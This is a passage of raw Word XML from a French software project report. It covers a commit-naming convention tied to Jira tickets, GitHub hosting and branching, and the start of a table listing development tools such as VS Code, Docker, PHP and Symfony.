          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="005E7074" w:rsidRPr="005E7074">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FEBC852" wp14:editId="18A75F35">
            <wp:extent cx="5683249" cy="2286000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2137699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99433" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5698516" cy="2292141"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3892A489" w14:textId="2C3DA29A" w:rsidR="005E7074" w:rsidRDefault="005E7074" w:rsidP="00FB7EEC">
      <w:pPr>
        <w:spacing w:before="360" w:after="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00B72E1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fig.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00B72E1F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00102517" w:rsidRPr="00102517">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Exemple de l'historique des </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00102517" w:rsidRPr="00102517">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>commits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00102517" w:rsidRPr="00102517">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> réalisés sur le dépôt GitHub du projet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB3F6F5" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="000E1DB2">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc233817737"/>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5FA3"/>
        </w:rPr>
        <w:t xml:space="preserve">Une stratégie de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5FA3"/>
        </w:rPr>
        <w:t>commits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5FA3"/>
        </w:rPr>
        <w:t xml:space="preserve"> liée aux tickets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="7850DBC3" w14:textId="77777777" w:rsidR="00102517" w:rsidRPr="00102517" w:rsidRDefault="00102517" w:rsidP="00102517">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00102517">
        <w:t xml:space="preserve">Afin de garantir une traçabilité optimale des modifications, une convention de nommage des </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00102517">
        <w:t>commits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00102517">
        <w:t xml:space="preserve"> a été mise en place. Chaque message de commit débute par la référence du ticket Jira auquel il est associé, suivie d'une description concise de la modification réalisée. Par exemple :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510BD2D5" w14:textId="77777777" w:rsidR="00102517" w:rsidRPr="00102517" w:rsidRDefault="00102517" w:rsidP="00F86F99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:before="360" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00102517">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pp</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00102517">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-17 : gestion des demandes de souscription</w:t>
      </w:r>
      <w:r w:rsidRPr="00102517">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA40D1F" w14:textId="77777777" w:rsidR="00102517" w:rsidRPr="00102517" w:rsidRDefault="00102517" w:rsidP="00102517">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00102517">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>pp</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00102517">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-20 : ajout de la validation des formulaires</w:t>
      </w:r>
      <w:r w:rsidRPr="00102517">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29982CA3" w14:textId="77777777" w:rsidR="00102517" w:rsidRPr="00102517" w:rsidRDefault="00102517" w:rsidP="00F86F99">
      <w:pPr>
        <w:spacing w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00102517">
        <w:t>Cette convention facilite le suivi du développement en permettant d'identifier rapidement la fonctionnalité concernée par chaque modification. Elle simplifie également les revues de code, les recherches dans l'historique Git et la compréhension de l'évolution du projet, tout en établissant un lien direct entre les tickets Jira et les changements apportés au code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F15FEA7" w14:textId="407F8CFF" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F" w:rsidP="00E83FF4">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79D72ADA" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F" w:rsidP="000E1DB2">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E93D366" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="000E1DB2">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc233817738"/>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5FA3"/>
        </w:rPr>
        <w:t>Plateforme et sauvegarde</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="4939B3BA" w14:textId="77777777" w:rsidR="00102517" w:rsidRPr="00102517" w:rsidRDefault="00102517" w:rsidP="00C1520D">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00102517">
        <w:t xml:space="preserve">Le dépôt Git est hébergé sur </w:t>
      </w:r>
      <w:r w:rsidRPr="00102517">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GitHub</w:t>
      </w:r>
      <w:r w:rsidRPr="00102517">
        <w:t>, qui constitue la plateforme centrale de gestion du projet. GitHub offre un espace sécurisé permettant de stocker l'ensemble du code source, de conserver l'historique des versions et de sauvegarder automatiquement les différentes évolutions du projet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B0C8BA" w14:textId="77777777" w:rsidR="00102517" w:rsidRPr="00102517" w:rsidRDefault="00102517" w:rsidP="00C1520D">
      <w:pPr>
        <w:spacing w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00102517">
        <w:t xml:space="preserve">Au-delà de son rôle de stockage, GitHub facilite le travail collaboratif grâce à la gestion des branches, au partage du code entre les membres de l'équipe et au suivi des modifications apportées par chaque développeur. Les branches de fonctionnalités sont régulièrement fusionnées dans la branche </w:t>
      </w:r>
      <w:r w:rsidRPr="00102517">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dev</w:t>
      </w:r>
      <w:r w:rsidRPr="00102517">
        <w:t xml:space="preserve"> une fois les développements terminés, testés et validés, garantissant ainsi une intégration progressive et maîtrisée des nouvelles fonctionnalités dans le projet. Cette méthode contribue à maintenir une base de code stable tout au long du développement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E6B7E6" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="6B29D83B" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4" w:rsidP="00553A67">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:spacing w:before="240" w:after="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc233817739"/>
      <w:r>
        <w:t>4. ENVIRONNEMENT TECHNIQUE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="5D5CF3E6" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4" w:rsidP="00553A67">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc233817740"/>
      <w:r>
        <w:t>4.1 Environnement de développement</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>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05"/>
        <w:gridCol w:w="2708"/>
        <w:gridCol w:w="3613"/>
      </w:tblGrid>
      <w:tr w:rsidR="002A5F4C" w14:paraId="3C41A683" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2705" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          </w:tcPr>
          <w:p w14:paraId="5205A19C" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Catégorie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2708" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          </w:tcPr>
          <w:p w14:paraId="3D15BC75" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Outil / Technologie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3613" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          </w:tcPr>
          <w:p w14:paraId="05EBA5BB" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Version / Précision</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A5F4C" w14:paraId="3E74EE3C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2705" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3D9DD68B" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:t>Éditeur de code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2708" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6B3C5C00" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:t>Visual Studio Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3613" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="05A24D1C" w14:textId="55B24961" w:rsidR="002A5F4C" w:rsidRDefault="00C05321" w:rsidP="00C05321">
            <w:r w:rsidRPr="00C05321">
              <w:t>1.127</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A5F4C" w14:paraId="3DC1DAF9" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2705" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="26E43D14" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:t>Gestion de versions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2708" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1D07F478" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:t>Git / GitHub</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3613" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="553A6F04" w14:textId="4A500277" w:rsidR="002A5F4C" w:rsidRDefault="00C05321" w:rsidP="00BB2647">
            <w:r>
              <w:t xml:space="preserve">2.44 / </w:t>
            </w:r>
            <w:r w:rsidR="00BB2647" w:rsidRPr="00BB2647">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>3.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A5F4C" w14:paraId="1E9790C6" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2705" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="50FA5939" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:t>Conteneurisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2708" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2F3DC696" w14:textId="528772C9" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:t>Docker</w:t>
            </w:r>
            <w:r w:rsidR="00BB2647">
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Docker Compose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3613" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6FF82B07" w14:textId="19CFE2D9" w:rsidR="002A5F4C" w:rsidRDefault="00BB2647">
            <w:r>
              <w:t>29.1 / 2.40</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A5F4C" w14:paraId="10BED200" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2705" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3799BEB1" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:t xml:space="preserve">Langages </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>front-end</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2708" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="20356013" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:t>HTML5, CSS3, JavaScript</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3613" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3AB36F3A" w14:textId="6DD4CE8C" w:rsidR="002A5F4C" w:rsidRDefault="00BB2647">
            <w:r>
              <w:t xml:space="preserve">5 / 3 / </w:t>
            </w:r>
            <w:r w:rsidR="0097702C">
              <w:t>ES6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A5F4C" w14:paraId="032A7541" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2705" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="038AF9E2" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:t xml:space="preserve">Framework </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>front-end</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2708" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="05A10934" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:t xml:space="preserve">Bootstrap 5 (thème </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Bootswatch</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3613" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0DEAC8EA" w14:textId="04B159AF" w:rsidR="002A5F4C" w:rsidRDefault="00BB2647">
            <w:r>
              <w:t>5.0.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A5F4C" w14:paraId="4011AA67" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2705" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0EE0F397" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:t xml:space="preserve">Langage </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>back-end</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2708" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="66EDAB71" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:t>PHP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3613" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="46D6F8C0" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C">
            <w:r>
              <w:t>8.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A5F4C" w14:paraId="6774EC7E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2705" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="00C3044B" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:t xml:space="preserve">Framework </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>back-end</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2708" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="548860AD" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:t>Symfony</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3613" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0EF1A5DE" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C">
            <w:r>
              <w:t>7.4</w:t>
            </w:r>
          </w:p>
